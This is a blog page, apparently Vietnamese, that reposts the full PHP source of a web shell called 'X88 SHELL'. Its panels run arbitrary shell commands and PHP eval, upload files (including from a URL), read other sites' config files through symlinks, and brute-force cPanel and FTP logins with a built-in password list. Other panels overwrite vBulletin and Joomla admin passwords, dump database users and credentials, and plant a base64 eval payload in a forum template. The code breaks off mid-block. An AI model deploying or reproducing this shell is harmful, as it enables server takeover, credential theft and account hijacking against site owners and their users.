• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Code » Local Attack » Shell » özel bir shell

özel bir shell

Unknown Labels: Code, Local Attack, Shell Leave A Comment 21:12
Code:
<?php
$fdownload=$_GET['fdownload'];
if ($fdownload <> "" ){
$path_parts = pathinfo("$fdownload");
$entrypath=$path_parts["basename"];
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
echo '<center><img border="0" src="http://www4.0zz0.com/2011/04/12/18/491768547.jpg"><body bgcolor=black alink="#20c0ff" vlink="#20c0ff" link="#20c0ff">';
echo "</center><font color=white size=3>PHP Is :</font>";
echo "<html> <font color=c0c0a0 size=3>";
echo phpversion(); 
echo "</font>";
echo "<br>";
if(@ini_get("safe_mode")){$safe_m="<font color='red'>ON <font/> ";}else{$safe_m="<font color='green'>OFF <font/> ";}
echo " <font size=3><center> </center>";
echo "</center><font color=white size=3>SafeMode : [ $safe_m <font color=white size=3>]";
echo "<center><font color=red size=9></font></center>";
echo "<font color='white'>Server:</font><font color='#DCE7EF' size='1' face='Arial'>";
echo "</font><font color='#DCE7EF' size='3' face='Arial'>";
echo(htmlentities($_SERVER['SERVER_SOFTWARE']));
echo"</font></font><style type='text/css'>body{cursor: crosshair;}</style>";
$xm8 = @ini_get("open_basedir");
if ($xm8 or strtolower($xm8) == "<font color='red'>[ON]") {$openbasedir = true; $hopenbasedir = "<font color='red' size='3'>".$xm8."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color='green'>[OFF] - not secure</font>";}
echo("<br>");
echo("<font color='white'>Open Base Dir: $hopenbasedir</font>");

echo("<font color=white><br>");
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<font color='#00ffff' size=4> \ </font>");
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<font color='#00ffff' size=4> \ </font>");
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b><font color='white'>"; }
echo "<br>";
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#008000>On</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>";
echo "<br>Disable Functions: <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
echo "<br>Register globals: <b>";
$reg_g = @ini_get("register_globals");
if($reg_g){
echo "<b><font color=#008000>ON</font>"; } else { echo "<b><font color=red>OFF</font>"; }
echo "</b></b></b>";
error_reporting(0);
$me = basename(__FILE__);
$cookiename = "wieeeee";
if(isset($_GET['p']) && $_GET['p'] == "about")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}
echo " <font size=3><center> </center>";
echo "</center><font size=3>";
echo "<font color=white>Uname -A = <font color=c08060>".php_uname()."</font>";
echo "<center><font size=3></center>";
echo "UID :<font color=a0ffff> ".@exec('id')."</font>";
print '<br>Your IP = <font color=red>'.@$_SERVER['REMOTE_ADDR'].' '.@$_SERVER['REMOTE_HOST'].'</font>  ';
echo " <center> </center>";
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
echo "Server IP = <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])." </font>[</span><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing Search</a>]";
echo '<a href=?><center><font color="red"><b>[</b><font color="green" size=4> home <font color="red"><b>]</b></font><a>';
$pages = array(
'cmd' => '<center><font color="red"><b>[</b><font color="c0ff00"> Command <font color="red"><b>]</b></font>',
'eval' => '<font color="red"><b>[</b><font color="c0ff00"> Eval Code <font color="red"><b>]</b></font>',
'mysql' => '<font color="red"><b>[</b><font color="c0ff00"> MySQL Query <font color="red"><b>]</b></font>',
'chmod' => '<font color="red"><b>[</b><font color="c0ff00"> Chmod File <font color="red"><b>]</b></font>',
'phpinfo' => '<font color="red"><b>[</b><font color="c0ff00"> PHPinfo <font color="red"><b>]</b></font>',
 'cpanelftp' => '<font color="red"><b>[</b><font color="c0ff00"> Cpanel,FTP  تخمين <font color="red"><b>]</b></font>',
'upload' => '<font color="red"><b>[</b><font color="c0ff00"> Upload File-Upload File From URL<font color="red"><b>]</b></font>',
'uuuuuusers' => '<font color="red"><b>[</b><font color="c0ff00"> Users <font color="red"><b>]</b></font>',
   'symlink' => '<font color="red"><b>[</b><font color="c0ff00"> SymLink <font color="red"><b>]</b></font><center>',
'scahlf' => '<font color="red"><b>[</b><font color="c0ff00"> show_source &  highlight_file <font color="red"><b>]</b></font>',
'vbhack' => '<font color="red"><b>[</b><font color="c0ff00"> Vbulletin Hack Tools <font color="red"><b>]</b></font>',
'wpps' => '<font color="red"><b>[</b><font color="c0ff00"> WordPress Password Changer <font color="red"><b>]</b></font>',
'jpc' => '<font color="red"><b>[</b><font color="c0ff00"> Joomla Password Changer <font color="red"><b>]</b></font>',
 'capff' => '<font color="red"><b>[</b><font color="c0ff00"> قاهر اليهود للمنتديات <font color="red"><b>]</b></font>',
'about' => '<font color="red"><b>[</b><font color="c0ff00"> About <font color="red"><b>]</b></font>'
);
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ X88 SHELL</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #ffa080;
background: black;
}
#d {
background: #000060;
}
#f {
background: #000060;
}
#s {
background: #0000ff;
}
#d:hover
{
background: green;
}
#f:hover
{
background: red;
}
pre {
font-size: 10px;
font-family: verdana;
color: #4080ff;
font-size:8pt;
}
a:hover {
text-decoration: none;
}
input,textarea,select {
  color: #ffffff;
 border: 1px dotted #ff4040;
background-color: #000000;
background: #000000;
}

hr {
color: #ffff20;
background-color: #ffff20;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#20c0ff" vlink="#20c0ff" link="#20c0ff">
<table width=100%><td id="header" width=100%>
<p align=center>  ';
foreach($pages as $page => $page_name)
{
$header .= '<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a> ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<font color="#60c0ff"><tr><td><hr><center><font color="red"><b>&copy; <font color="lime">2011-2012  <font color="red">By : <font color="lime">ML7s-HackerS<font color="red"> & <font color="lime">Dr.Zero  </center></td></table></body></head></html>';




if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {

case 'cmd':

//Commander function
function cmd()
{
$cmd = $_POST['cmd'];
$cmdgo = $_POST['cmdgo'];
$option = $_POST['option'];
$id = $_GET['id'];
if($cmdgo && !empty($cmd))
{
    switch($option)
    {
        case system:
        system($cmd);
        break;
        case passthru:
        passthru($cmd);
        break;
        case shell_exec:
        $out = shell_exec($cmd);
        echo $out;
        break;
        default;
        system($cmd);

    }
    }
    }


echo "<form method=post action=''><font face='Courier New'>
</font></pre><br><input size=32 style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; background-color:#000000' type=text name=cmd style='background: black;color: white;border: 0px'><select name=option style='background: black;color: white'><option>system</option><option>passthru</option>
<option>shell_exec</option></select><input style='background: black;color: white;border: 1px dashed white 'type=submit name=cmdgo value=execute>
<textarea cols='125' rows='29' style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>";
cmd();
echo "</textarea>
</td></table></form>";


break;
case 'delete':

if(isset($_POST['yes']))
{
if(unlink($_GET['file']))
{
print "File deleted successfully.";
}
else
{
print "Couldn't delete file.";
}
}
if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
{
print "Are you sure you want to delete ".$_GET['file']."?<br>
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
<input type=hidden name=yes value=yes>
<input type=submit value=\"Delete\">
";
}
break;
case 'capff': 
if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
  <br>
<textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
<INPUT value=\"Set\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$index = $_POST['index'];
 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index  = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());

if($ok){
echo "!! update finish !!<br><br>";
}
}
break;
case 'symlink':
if ($_GET[p]=="symlink"){
if ($_POST['o'] != "ok"){
print'<body bgcolor=#000000>
<p align="center"><b><font color="yellow"  size="4">SymLink</font></b></p>
<p align="center">
<div align="center">
<form action="" method="POST"  >
<input  style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" name="usr" type="text" value="/home/user/public_html/vb/includes/config.php" align="LEFT" size="50" /> <br><input  style="border:1px dotted #FF004C; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000"  name="my" type="text" value="'.@getcwd().'/file.txt" align="LEFT" size="50" /><Br>
<input type="hidden" name="o" value="ok">
<input type="submit" value=Submit  style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form></p>
';
print $f;
}
else{
$sym = @symlink("$_POST[usr]","$_POST[my]");
print '
<body bgcolor=#000000>
<p align="center"><b><font color="yellow" size="4">SymLink<br></font></b></p>
<p align="center">
<p align="center"><b><font face="Pristina" size="4" color="#008000">';
if ($sym){
 print
'Done !!</p>
';}
else{print'Error<br>Cannot Be completed';}
print $f;
}
exit;
}



 break;


case 'uuuuuusers':

echo "<center><font color='red' size='7'>Users</font></center><textarea style=border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000 rows=12 name=usersx cols='23' >";
@system('ls /var/mail');
echo "</textarea>";




 break;



case 'jpc':


if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"database\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"db_user\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
  <br>
Set A New username For Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Don`t Change it Password is : 123456: <INPUT name=\"pwd\" size=\"15\" value=\"e10adc3949ba59abbe56e057f20f883e\"><br>

<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
if($SQL){
echo "<b>Success :Now Use A New User And Password - (123456)";
}
}
break;
case 'eval':
echo "
<form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
<tr><td height='45' colspan='2'>
<input type='text' name='php_eval' size='70' value='echo \"Fuck 4 Israel\";'>
<input type=submit name=submitEval value=Eval></td></tr></table></form>";
print "<h1>Output:</h1>";
print "<br>
";
if($_POST['submitEval']) // Execute Eval Code .
{
$eval = @str_replace("<?php","",$_POST['php_eval']);
$eval = @str_replace("<?php","",$eval);
$eval = @str_replace("?>","",$eval);
$eval = @str_replace("\\","",$eval);
echo eval($eval);
}
break;
case 'chmod':
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']);
}
else
{
$content = "file/path/please";
}

print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
<input type=text name=chmod value=\"".$content."\" size=70 style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'><br><b>New permission:</b>
<select name='chvalue' style='color: #ffffff; border: 1px dotted #a0ff00; background-color: #000000'>
<option value='777'>777</option>
<option value='644'>644</option>
<option value='755'>755</option>
</select><input type=submit value='Change' style='color: #ffffff; border: 1px dotted #ff0000; background-color: #000000'>";

break;

case 'mysql':
if(isset($_POST['host']))
{
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
mysql_select_db($_POST['dbase']);
$sql = $_POST['query'];


$result = mysql_query($sql);

}
else
{
print "
This only queries the database, doesn't return data!<br>
<form action=\"".$me."?p=mysql\" method=POST>
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

<b>Query:<br></b<textarea name=query></textarea>
<input type=submit value=\"Query database\">
</form>
";

}

break;

case 'createdir':
if(mkdir($_GET['crdir']))
{
print 'Directory created successfully.';
}
else
{
print 'Couldn\'t create directory';
}
break;
case 'vbhack':
$act = $_GET['act'];
if($act=='reconfig' && isset($_POST['path']))
{
$path = $_POST['path'];
include $path;

echo '<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th><font color=green>::::Read Config Data::::</font></th><th>';
echo '<font color=yellow>' . $path . '</font></th>';
echo '<tr>
<th><font color=green>Host : </font></th><th><font color=yellow>' . $config['MasterServer']['servername'] . '</font></th>
</tr>
<tr>
<th><font color=green>User : </font></th><th><font color=yellow>' . $config['MasterServer']['username'] . '</font></th>
</tr>
<tr>
<th><font color=green>Pass : </th><th>';
$passsql = $config['MasterServer']['password'];
if ($passsql == '')
{
$result = '<font color=red>No Password</font>';
} else {
$result = '<font color=yellow>' . $passsql . '</font>';
}
echo $result; 
echo '</th>
</tr>
<tr>
<th><font color=green>Name : </font></th><th><font color=yellow>' . $config['Database']['dbname'] . '</font></th>
</tr>
</table>';

}

if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw"  && isset

($_POST['vbuser'])  && isset($_POST['vbpass']))
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
$vbuser = $_POST['vbuser'];
$vbpass = $_POST['vbpass'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font 

color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font 

color=yellow>' . $db . '</font></font>';

$query = 'select * from user where username="' . $vbuser . '";';
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
$salt = $row['salt'];
$x = md5($vbpass);
$x =$x . $salt;
$pass_salt = md5($x);
$query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";';
$re = mysql_query($query);
if ($re)
{
echo '<font size=3><font color=yellow>The pass of the user </font><font color=red>' . $vbuser . '</font><font color=yellow> 

was changed to </font><font color=red>' . $vbpass . '</font><br>Back to <a href="?">Shell</a></font>';
} else {
echo '<font size=3><font color=red>Failed to change PassWord</font></font>';
}
}
}
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login")
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font 

color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font 

color=yellow>' . $db . '</font></font>';

echo '<hr color="#00FF00" />
<form name="changepass" action="?p=vbhack&act=psw" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::Change User Password:::::</th><th><input type="submit" name="Change" value="Change" /></th>
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
<tr><td>Pass : </td><td><input name="vbpass" value="DrZer0" /></td></tr>
</table>';

echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input 

type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
echo '
</form>
<hr color="#00FF00" />
<form name="changepass" action="?p=vbhack&act=mail" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::Change User E-MAIL:::::</th><th><input type="submit" name="Change" value="Change" /></th>
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
<tr><td>MAIL : </td><td><input name="vbmail" value="DrZero@live.com" /></td></tr>
</table>';

}


if ($act == ''){
echo '
<form name="myform" action="?p=vbhack&act=login" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" 

/></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr>
<tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr>
<tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr>
<tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr>
</table>
</form>';

}
if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db']))
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
if ($pass == '')
{
$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font 

color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font 

color=yellow>' . $db . '</font></font>';
echo '
<hr color="#00FF00" />';

$re = mysql_query('select * from user');
echo'<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th><font color=lime>ID</th><th><font color=lime>UserName</th><th><font 

color=lime>E-Mail</th><th><font color=lime>PassWord</th></font></font></font></font></font>';
while ($row = mysql_fetch_array($re))
{
echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td><td>' . $row

['password'] . '</td></tr>';
}
echo'</table>';
echo '
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th>';
$count = mysql_num_rows($re);
echo 'Number of users registered is : [ ' . $count . ' ]';
echo '</th></table>';

}
if ($act == 'users'){
echo '
 <form name="myform" action="?p=vbhack&act=lst" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" 

/></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr>
<tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr>
<tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr>
<tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr>
</table>
</form>';

}
if ($act=='config')
{
echo '
<form name="myform" action="?p=vbhack&act=reconfig" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::CONFIG PATH:::::</th><th><input type="submit" name="Connect" value="Read" /></th>
<tr><td>PATH : </td><td><input name="path" value="/home/User/public_html/vb/includes/config.php" 

/></td></tr></table></form>';

}


echo '
<center>
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><td><a href="?p=vbhack&act=users"><font color=red size=5>List 

Users</a></td><td><a href="?p=vbhack&act=config"><font color=red size=5>ReadConfig</a></td></tr></table>';
break;
case 'cpanelftp':
echo "</td></tr></table></form>
</td>
<td valign='top'>
<!-- Cpanel And FTP BruteForce Attacker -->
<form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  <center>
<textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='users' cols='23' >";
@system('ls /var/mail');
echo "</textarea>
<textarea  style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\nabc123\n112233\n332211\nasd123\nadmin123\npassword\npass123\nwebmaster\nadminpass</textarea>
   <center> <input type='text' name='target' size='16' value='localhost'  style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000'>
<input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
<input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
<input type='submit' value='   Crack it !   ' name='BruteForceCpanelAndFTP'  style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000' >
</td></tr></table></form>
</td>
<td valign='top'>
";

 if($_POST['BruteForceCpanelAndFTP'])
{
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['BruteForceCpanelAndFTP'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];

if(empty($target))
{
$target = "localhost";
}

function ftp_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
 print "Error : Connection Timeout Please Check The Target Hostname .";
 exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>";
}
curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "[-] Connection Timeout Please Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>";
}
curl_close($ch);
}
if(isset($submit) && !empty($submit))
{
if(empty($users) && empty($pass))
{
print "<b><font color=40c0ff>[-] Please Check The Users or Password List Entry . . .";
}
if(empty($users))
{
print "<b><font color=40c0ff>[-] Please Check The Users List Entry . . .";
}
if(empty($pass))
{
print "<b><font color=40c0ff>[-] Please Check The Password List Entry . . ";
}
$userlist=explode("\n",$users);
$passlist=explode("\n",$pass);
print "<b><font color=40c0ff>[~]# Cracking Process Started, Please Wait ...";
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password )
{
$purepass = trim($password);
if($cracktype == "ftp")
{
ftp_check($target,$pureuser,$purepass,$connect_timeout);
}
if ($cracktype == "cpanel")
{
cpanel_check($target,$pureuser,$purepass,$connect_timeout);
}
}
}
}
}

break;

case 'phpinfo':
phpinfo();
break;


case 'rename':

if(isset($_POST['fileold']))
{
if(rename($_POST['fileold'],$_POST['filenew']))
{
print "File renamed.";
}
else
{
print "Couldn't rename file.";
}

}
if(isset($_GET['file']))
{
$file = basename(htmlspecialchars($_GET['file']));
}
else
{
$file = "";
}

print "Renaming ".$file." in folder ".realpath('.').".<br>
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
<input type=submit value=\"Rename file\">
</form>";
break;
case 'scahlf':
echo "<html>
</td></tr></table><form method='POST' enctype='multipart/form-data' >
</td></tr></table><form method='POST' enctype='multipart/form-data' >
<br>
<b>show_source  : </b><input type='text' name='show' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
<b>highlight_file : </b><input type='text' name='high' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
<input type='submit''  value='Read'  style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></form</p>
</form</p>";

if(empty($_POST['show']))
{
}
else
{
$s = $_POST['show'];
echo "<b><h1><font size='4' color='silver'>show_source</font></h1>";
$show = show_source($s);
}
if(empty($_POST['high']))
{
}
else
{
$h = $_POST['high'];
echo "<b><h1><font size='4' color='silver'>highlight_file</font></h1>";
echo "<br>";
$high = highlight_file($h);
}
break;
case 'about':
  echo '<center>
<font color="red" size="7">Ml7s-HackerS - Dr.Zero';
   echo '<center>
<font color="lime" size="4">Emails  : <font color="yellow">XM8@HoTmAil.CoM , DrZero@Live.Com
<center><font color="green">Everywhere and Anywhere, We Are There';

break;

case 'upload':

 echo '</pre></form>';
if (isset($_POST['upload'])) { $savefile = getcwd()."/" . $_FILES['file']['name']['0']; move_uploaded_file($_FILES['file']['tmp_name']['0'], $savefile); $filesizename = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB"); $size = round($_FILES['file']['size']['0']/pow(1024, ($i = floor(log($_FILES['file']['size']['0'], 1024)))), 2) . $filesizename[$i];print "<b>Uploaded be completed !</b><br>Details:<br>Filename: <b>" . $_FILES['file']['name']['0'] . "</b>.<br>Size: <b>" . $size . "</b>.";}
echo '<br><u><b>Upload Files:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="file" name="file[]" size="50"><br><input type="submit" value="Upload File !" name="upload"></form><hr><br>';
if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text']; $newfile=$_POST['rename']; if (!copy($file, $newfile)) {echo "failed to copy $file...\\n";}}
echo '<u><b>Upload Files From URL:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="text" name="upload_url_text" size="50"><br>Rename to: <input type="text" name="rename" size="10" value="inj.php"><br><input type="submit" value="Upload File !" name="upload_url"></form>';


break;


  case 'edit':


 print'<body bgcolor=#000000>
<p align="center">';
if($_POST[incl] != ""){
$file = @fopen($_POST[incl],r);
$data=@fread($file,1546768);
$msr = str_replace("\\\\","\\",$_POST[incl]);
print '<form action="" method="POST"><br>
